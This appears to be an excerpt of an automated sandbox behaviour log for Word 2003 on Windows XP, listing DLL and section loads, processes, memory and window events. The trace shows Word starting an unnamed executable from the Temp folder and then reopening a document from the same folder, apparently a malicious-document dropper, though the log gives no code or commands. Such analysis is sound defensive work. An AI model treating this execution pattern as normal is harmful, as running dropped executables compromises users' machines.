    C:\WINDOWS\system32\msimtf.dll write and read and execute commit E20000 159744 own pid execute success or wait 1
    \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown E20000 4096 own pid read write success or wait 1
    \KnownDlls\CLBCATQ.DLL write and read and execute unknown E20000 4096 own pid read write object name not found 1
    C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
    \KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
    C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL write and read and execute commit E40000 368640 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL query and write and read and execute image 10000000 372736 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read reserve 10000000 372736 own pid read write object name exists 1
    C:\WINDOWS\system32\winlogon.exe write and read and execute commit FC0000 507904 own pid execute success or wait 1
    \KnownDlls\xpsp2res.dll write and read and execute unknown FC0000 507904 own pid execute object name not found 1
    C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image FC0000 2904064 own pid read write conflicting addresses 1
    C:\WINDOWS\system32\sti.dll write and read and execute commit 1590000 69632 own pid execute success or wait 1
    C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1
    \KnownDlls\CFGMGR32.dll write and read and execute unknown 73BA0000 77824 own pid read write object name not found 1
    C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
    \KnownDlls\setupapi.DLL write and read and execute unknown 74AE0000 28672 own pid read write object name not found 1
    C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 77920000 995328 own pid read write object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read reserve 1590000 126976 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH..FLBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19521106360 query and write and read and execute and extend size unknown 15C0000 126976 own pid read write success or wait 1
    \BaseNamedObjects\Local\Mso97SharedDg19531106360 query and write and read and execute and extend size unknown 15C0000 126976 own pid read write object name not found 1
    \BaseNamedObjects\Local\Mso97SharedDg19531106360 query and write and read reserve 15C0000 126976 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.Shared.SFM.AJH query and write and read and execute and extend size unknown 15E0000 524288 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.B.FLBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.C.FLBMB query and write and read commit 1660000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.D.FLBMB query and write and read commit 1670000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.E.FLBMB query and write and read commit 1680000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.F.FLBMB query and write and read commit 1690000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.G.FLBMB query and write and read commit 16A0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.H.FLBMB query and write and read commit 16B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.I.FLBMB query and write and read commit 16C0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.J.EMBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.K.EMBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.L.EMBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    C:\DOCUME~1\ALLUSE~1\APPLIC~1\MICROS~1\OFFICE\DATA\OPA11.BAK query and write and read and execute and extend size commit 1660000 12288 own pid readonly success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.M.ENBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.N.ENBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.O.ENBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.P.DOBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.AB.DOBMB query and write and read commit 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.G.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.H.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.I.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.J.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.K.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.L.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.M.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.N.DOBMB query and write and read and execute and extend size unknown 15B0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap30B4E query and write and read reserve 1670000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DFMap0-199506 query and write and read commit 1A70000 524288 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1A70000 524288 own pid read write object name not found 1
    \BaseNamedObjects\Local\MSO_Formal11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1A70000 8192 own pid read write success or wait 1
    \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1A70000 8192 own pid read write object name not found 1
    \BaseNamedObjects\Local\MSO_AdHoc11106360_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1A80000 8192 own pid read write success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL write and read and execute commit 2E50000 1773568 own pid execute success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL query and write and read and execute image 39800000 1777664 own pid read write success or wait 1
    \KnownDlls\WTSAPI32.DLL write and read and execute unknown 39800000 1777664 own pid read write object name not found 1
    C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
    \KnownDlls\WINSTA.dll write and read and execute unknown 76F50000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76360000 65536 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S query and write and read and execute and extend size image 5B860000 348160 own pid read write success or wait 1
    C:\WINDOWS\system32\apphelp.dll write and read and execute commit 2F80000 126976 own pid execute success or wait 1
    C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 2F80000 1208320 own pid readonly success or wait 1
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S query and read commit 2F80000 20480 own pid readonly success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and write and read and execute and extend size image 2F80000 20480 own pid readonly success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and read commit 2F90000 12050432 own pid readonly success or wait 1
    + Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12218368 own pid execute success or wait 1 30003006
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12263424 own pid read write success or wait 1 30003006
    \BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003006
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 303703E2
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1 303703E2
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown 755C0000 188416 own pid read write object name not found 1 30029EE0
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit A90000 4096 own pid read write success or wait 1 30029EF7
    Registry Activities:
    + Key value queried
    Key Path Name Completion Count Source Address
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager CommonFilesDir success or wait 1 30002FEA
    Process Activities:
    + Process started
    PID Filepath Cmdline Flags Completion Count Source Address
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\S 0 success or wait 1 1239A2
    296 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc 0 success or wait 1 123A5A
    + Process terminated
    PID Filepath Completion Count Source Address
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 123A60
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 0 123A60
    Memory Activities:
    + Memory allocated
    PID Filepath Base Length Protection Completion Count Source Address
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 21E000 123170 page read and write success or wait 1 123900
    + Memory attributes changed
    PID Filepath Base Length New Protection Old Protection Completion Count Source Address
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B4D000 1000 page readonly page read and write success or wait 1 30001C39
    User Activities:
    + Window created
    Window name Class name Completion Count Source Address
    OpusApp OpusApp success 1 3002919F
    _WwC _WwC success 1 300516EB
    _WwF _WwF success 1 300516EB
    _WwB _WwB success 1 3002919F
    _WwF _WwF success 1 300516EB
    _WwB _WwB success 1 3002919F
    _WwG _WwG success 1 3002919F
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    + Window found
    Window name Class name HWND of window Completion Count Source Address
    no string MSOBALLOON 0 success 1 0
    no string MsoHelp10 0 success 1 0
    no string AgentAnim 0 success 1 0
    + Message sent to window
    HWND Message LParam WParam Completion Count Source Address
    A00D0 45F 0 0 success 1 30003AB6
    20132 DDE_ACK 655694 3221864475 success 1 3064C4CA
    + Window hook set
    Module Thread id Hook code Completion Count Source Address
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 1904 FFFFFFFF success 1 3000783A
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 427760532
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 427766702
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 427770570
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 427771929
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 427773528
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 427774362
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 427775871
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 427776237
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 427821870
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 427826544
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 427831802
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 427839389
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 427843547
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 427851943
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 427858056
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 427891754
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 427896646
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 427898840
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 427922404
    Memory attributes changed PID: 1888 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B4D000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 427944169
    Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: CommonFilesDir success or wait 427946240
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12218368 Protection: execute Mapped to pid: own pid success or wait 427947953
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12263424 Protection: read write Mapped to pid: own pid success or wait 427952988
    Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 428004249
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 774144 Protection: execute Mapped to pid: own pid success or wait 428252304
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: query and read Type: commit Baseaddress: 8C0000 Size: 774144 Protection: readonly Mapped to pid: own pid success or wait 428256636
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19211106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 774144 Protection: readonly Mapped to pid: own pid object name not found 428343390
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19211106360 Access: query and write and read Type: reserve Baseaddress: A10000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 428344745
    Section loaded Path: \KnownDlls\uxtheme.dll Access: write and read and execute Type: unknown Baseaddress: A10000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 428347181
    Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 428348970
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A30000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 428413436
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 428417026
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 428424918
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A30000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 428439457
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 428443531
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 428445789
    Window created Window Name: OpusApp Class Name: OpusApp success 428480200
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: A50000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 428481823
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 428485565
    Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 428513776
    Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: A50000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 428524488
    Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 428528439
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: A90000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 428533623
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: A90000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 428537714
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: A90000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 428543134
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: A90000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 428545686
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: A90000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 428549127
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 428551711
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid object name not found 428570653
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: query and write and read Type: commit Baseaddress: A90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 428570997
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 1753088 Protection: execute Mapped to pid: own pid success or wait 428574226
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: query and read Type: commit Baseaddress: AA0000 Size: 1753088 Protection: readonly Mapped to pid: own pid success or wait 428578375
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg20321106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: AA0000 Size: 1753088 Protection: readonly Mapped to pid: own pid object name not found 428580139
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg20321106360 Access: query and write and read Type: reserve Baseaddress: C50000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 428580497
    Section loaded Path: \KnownDlls\msi.dll Access: write and read and execute Type: unknown Baseaddress: C50000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 428605860
    Section loaded Path: C:\WINDOWS\system32\msi.dll Access: query and write and read and execute Type: image Baseaddress: 7D1E0000 Size: 2867200 Protection: read write Mapped to pid: own pid success or wait 428607630
    Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1904 Hook ID: FFFFFFFF success 429215441
    Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: CF0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 429233940
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 429570594
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: CF0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 429584640
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 429631719
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: CF0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 429647558
    Window created Window Name: _WwC Class Name: _WwC success 430009902
    Window created Window Name: _WwF Class Name: _WwF success 430700275
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 430709191
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 430709976
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 430710498
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 966656 Protection: execute Mapped to pid: own pid success or wait 430716660
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: query and write and read and execute Type: image Baseaddress: 39700000 Size: 962560 Protection: read write Mapped to pid: own pid success or wait 430718495
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 430727157
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430735077
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430737405
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430738742
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430740006
    Section loaded Path: \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: E20000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 430742552
    Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: E20000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 430754807
    Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 430755422
    Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 430757022
    Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 430757649
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 430760641
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: write and read and execute Type: commit Baseaddress: E40000 Size: 368640 Protection: execute Mapped to pid: own pid success or wait 430853908
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 430856266
    Section loaded Path: \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: reserve Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid object name exists 430956486
    Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: FC0000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 431007834
    Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: FC0000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 431013602
    Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: FC0000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 431014391
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: write and read and execute Type: commit Baseaddress: 1590000 Size: 69632 Protection: execute Mapped to pid: own pid success or wait 432512682
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: query and write and read and execute Type: image Baseaddress: 73BA0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 432514154
    Section loaded Path: \KnownDlls\CFGMGR32.dll Access: write and read and execute Type: unknown Baseaddress: 73BA0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 432515132
    Section loaded Path: C:\WINDOWS\system32\cfgmgr32.dll Access: query and write and read and execute Type: image Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 432515775
    Section loaded Path: \KnownDlls\setupapi.DLL Access: write and read and execute Type: unknown Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 432516816
    Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 432517393
    Message posted HWND: A00D0 Message: 45F WParam: 0 LParam: 0 success 432632817
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 432639859
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read Type: reserve Baseaddress: 1590000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 432640000
